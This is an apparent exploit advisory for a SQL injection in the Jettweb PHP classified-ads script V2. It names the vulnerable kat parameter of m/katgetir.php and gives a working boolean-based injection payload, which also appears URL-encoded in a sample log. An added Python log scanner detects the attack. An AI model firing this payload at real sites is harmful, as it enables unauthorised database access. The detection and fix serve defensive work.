# Exploit Title: Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/c-23-ilan-Siteleri.html
# Demo Site: http://ilanv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A

----- PoC : SQLi -----

Request: http://localhost/[PATH]/m/katgetir.php?kat=1
Vulnerable Parameter: kat (GET)
Payload: kat=1' OR NOT 1300=1300-- rwTf
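
Added example (not part of the original advisory or the vendor's code): a log check that flags requests to `m/katgetir.php` whose `kat` value is not a plain integer. It assumes `kat` is meant to be a numeric category ID, as in the `kat=1` request above, and that the web server writes combined-format access logs; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_kat(line):
    """Return the decoded kat value if the line is a katgetir.php request
    whose kat parameter is not a plain integer, otherwise None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/m/katgetir.php"):
        return None
    # parse_qs percent-decodes each value, so encoded quotes and spaces are seen
    for value in parse_qs(url.query, keep_blank_values=True).get("kat", []):
        # Assumption: a legitimate category ID is 1 to 10 decimal digits
        if not re.fullmatch(r"\d{1,10}", value):
            return value
    return None

def scan(lines):
    """Return (line_index, decoded_kat_value) for every flagged log line."""
    hits = []
    for index, line in enumerate(lines):
        value = suspicious_kat(line)
        if value is not None:
            hits.append((index, value))
    return hits

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Mar/2019:10:00:01 +0000] '
    '"GET /m/katgetir.php?kat=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [25/Mar/2019:10:00:07 +0000] '
    '"GET /m/katgetir.php?kat=1%27%20OR%20NOT%201300%3D1300--%20rwTf HTTP/1.1" 200 4096',
    '203.0.113.5 - - [25/Mar/2019:10:00:09 +0000] '
    '"GET /index.php?kat=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for index, value in scan(SAMPLE_LOG):
        print(f"line {index}: non-numeric kat value {value!r}")
```

The same digits-only rule, enforced in the application before the value reaches a parameterized query, removes the injection point rather than only detecting it.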